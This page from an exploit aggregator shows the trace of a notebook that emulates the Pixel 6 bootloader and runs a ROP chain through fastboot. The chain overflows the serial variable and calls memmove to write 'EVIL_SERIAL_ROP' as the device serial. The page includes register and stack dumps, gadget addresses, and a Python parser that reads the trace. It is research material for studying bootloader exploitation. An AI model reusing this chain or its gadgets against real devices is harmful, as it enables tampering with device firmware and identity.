## https://sploitus.com/exploit?id=FDF8A206-EAB1-5C03-BF73-61095BBB3EEA
# Updating ABL serial with ROP:
When run, this notebook loads ABL and attempts to update the device's serial number via a ROP chain that calls memmove(). Derived from eShard's https://github.com/eshard/pixel6-boot/blob/main/run_abl_public.ipynb while following along with https://eshard.com/posts/pixel6_bootloader
# Output
```
partition misc not found
failed to read misc(vendor) partition -2
[ 0.000000] [E] [PXL] could not get charger state -27
[ 0.000000] [I] [PXL] boot voltage threshold=3400mV
##### INTERRUPT
0xffff0000f880d3e0: mov x20, x0
^ Got interrupt 0d ffff0000f880d3e0. Skipping instruction.
start_app hook:
0xffff0000f88105a0: ret
fastboot_menu_start hook:
0xffff0000f887be94: ret
>>> fastboot_read:
[ 0.000000] [I] [FB] Accept cmd:flashing unlock
<<< INFOdevice already unlocked
<<< OKAY
>>> fastboot_read:
[ 0.000000] [I] [FB] Accept cmd:oem dmesg
<<< OKAY
>>> fastboot_read:
[ 0.000000] [I] [FB] Accept cmd:getvar:serialno
<<< OKAYDAAAAABBBBAAAAAA
>>> fastboot_read:
[ 0.000000] [I] [FB] Accept cmd:
<<< FAILvariable (serialnoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>>> Exiting
0xffff0000f8815a84: mov sp, x29
0xffff0000f8815a88: ldp x20, x19, [sp, #0x30]
0xffff0000f8815a8c: ldp x22, x21, [sp, #0x20]
0xffff0000f8815a90: ldp x24, x23, [sp, #0x10]
0xffff0000f8815a94: ldp x29, x30, [sp], #0x40
0xffff0000f8815a98: ret
## REGISTERS ##
X0 - 0
X1 - 40
X2 - FFFF0001047FEEF0
X3 - 0
X8 - 0
X19 - DEADBEEFDEADBE19
X20 - DEADBEEFDEADBA20
X21 - 4343434343434343
X22 - 4343434343434343
X23 - 4343434343434343
X24 - 4343434343434343
X28 - 0
X29 - 4444444444444444
X30 - FFFF0000F880C924
SP - FFFF000090700040
PC - FFFF0000F8815A98
## STACK DUMP ##
SP: ffff000090700040
@ffff000090700040 deadbeefdeadbe29 - #0
@ffff000090700048 ffff0000f8884684 - #8
@ffff000090700050 deadbeefdeadbe24 - #10
@ffff000090700058 ffff000090700070 - #18
@ffff000090700060 ffff0000f887e2d4 - #20
@ffff000090700068 ffff0000f8ac0058 - #28
@ffff000090700070 10 - #30
@ffff000090700078 deadbeefdeadb119 - #38
@ffff000090700080 ffff000090700090 - #40
@ffff000090700088 ffff0000f886fb88 - #48
Checking serial: DAAAAABBBBAAAAAA
0xffff0000f880c924: ldp x20, x19, [sp, #0x30]
0xffff0000f880c928: ldp x22, x21, [sp, #0x20]
0xffff0000f880c92c: ldp x24, x23, [sp, #0x10]
0xffff0000f880c930: ldp x29, x30, [sp], #0x40
0xffff0000f880c934: ret
## REGISTERS ##
X0 - 0
X1 - 40
X2 - FFFF0001047FEEF0
X3 - 0
X8 - 0
X19 - DEADBEEFDEADB119
X20 - 10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 - 0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884684
SP - FFFF000090700080
PC - FFFF0000F880C934
## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
Checking serial: DAAAAABBBBAAAAAA
0xffff0000f8884684: ldr x1, [x23, #0x10]
0xffff0000f8884688: mov x0, x21
0xffff0000f888468c: mov x2, x20
0xffff0000f8884690: blr x22
## REGISTERS ##
X0 - FFFF0000F8AC0058
X1 - FFFF000090700090
X2 - 10
X3 - 0
X8 - 0
X19 - DEADBEEFDEADB119
X20 - 10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 - 0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884684
SP - FFFF000090700080
PC - FFFF0000F8884690
## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
Checking serial: DAAAAABBBBAAAAAA
0xffff0000f887e2d4: bl #0xffff0000f8876b58
## REGISTERS ##
X0 - FFFF0000F8AC0058
X1 - FFFF000090700090
X2 - 10
X3 - 0
X8 - 0
X19 - DEADBEEFDEADB119
X20 - 10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 - 0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884694
SP - FFFF000090700080
PC - FFFF0000F887E2D4
## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
Checking serial: DAAAAABBBBAAAAAA
0xffff0000f887e2d8: mov w0, wzr
0xffff0000f887e2dc: ldp x29, x30, [sp], #0x10
0xffff0000f887e2e0: ret
## REGISTERS ##
X0 - 0
X1 - FFFF000090700090
X2 - 10
X3 - 0
X8 - FFFF0000F8AC0058
X19 - DEADBEEFDEADB119
X20 - 10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 - 0
X29 - FFFF000090700090
X30 - FFFF0000F886FB88
SP - FFFF000090700090
PC - FFFF0000F887E2E0
## STACK DUMP ##
SP: ffff000090700090
@ffff000090700090 5245535f4c495645 - #0
@ffff000090700098 504f525f4c4149 - #8
@ffff0000907000a0 0 - #10
@ffff0000907000a8 0 - #18
@ffff0000907000b0 0 - #20
@ffff0000907000b8 0 - #28
@ffff0000907000c0 0 - #30
@ffff0000907000c8 0 - #38
@ffff0000907000d0 0 - #40
@ffff0000907000d8 0 - #48
Checking serial: EVIL_SERIAL_ROP
>>> PC = 0x0
```
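As an added example (not part of the notebook or eShard's code), a small Python parser for the emulator's register and stack dump format shown above. It recovers the `memmove(dst, src, n)` arguments at the `blr x22` step from X0/X1/X2 and reassembles the little-endian stack words at `src`, which is how one confirms from the trace alone that the chain copies `EVIL_SERIAL_ROP` into the serial buffer. The excerpt is constructed from the values on this page.

```python
import re
import struct

# Constructed excerpt of the trace above: register state at `blr x22`
# (X22 = the memmove wrapper) and the stack dump that follows it.
TRACE = """\
0xffff0000f8884690: blr x22
## REGISTERS ##
X0 - FFFF0000F8AC0058
X1 - FFFF000090700090
X2 - 10
X22 - FFFF0000F887E2D4
PC - FFFF0000F8884690
## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
"""

REG_RE = re.compile(r"^(X\d+|SP|PC) - ([0-9A-Fa-f]+)$", re.M)
STACK_RE = re.compile(r"^@([0-9a-f]+) ([0-9a-f]+) - #", re.M)


def parse_registers(trace):
    """Map register name -> value from the '## REGISTERS ##' block."""
    return {m.group(1): int(m.group(2), 16) for m in REG_RE.finditer(trace)}


def parse_stack(trace):
    """Map address -> 8-byte word from the '## STACK DUMP ##' block."""
    return {int(a, 16): int(v, 16) for a, v in STACK_RE.findall(trace)}


def read_memory(stack, addr, length):
    """Reassemble bytes [addr, addr+length) from little-endian stack words."""
    base, out = addr & ~7, bytearray()
    while len(out) < (addr & 7) + length:
        out += struct.pack("<Q", stack[base])  # KeyError if dump lacks it
        base += 8
    return bytes(out[addr & 7:(addr & 7) + length])


def memmove_call(trace):
    """Return (dst, src, n, payload) for the memmove reached via `blr x22`."""
    regs, stack = parse_registers(trace), parse_stack(trace)
    dst, src, n = regs["X0"], regs["X1"], regs["X2"]
    return dst, src, n, read_memory(stack, src, n)
```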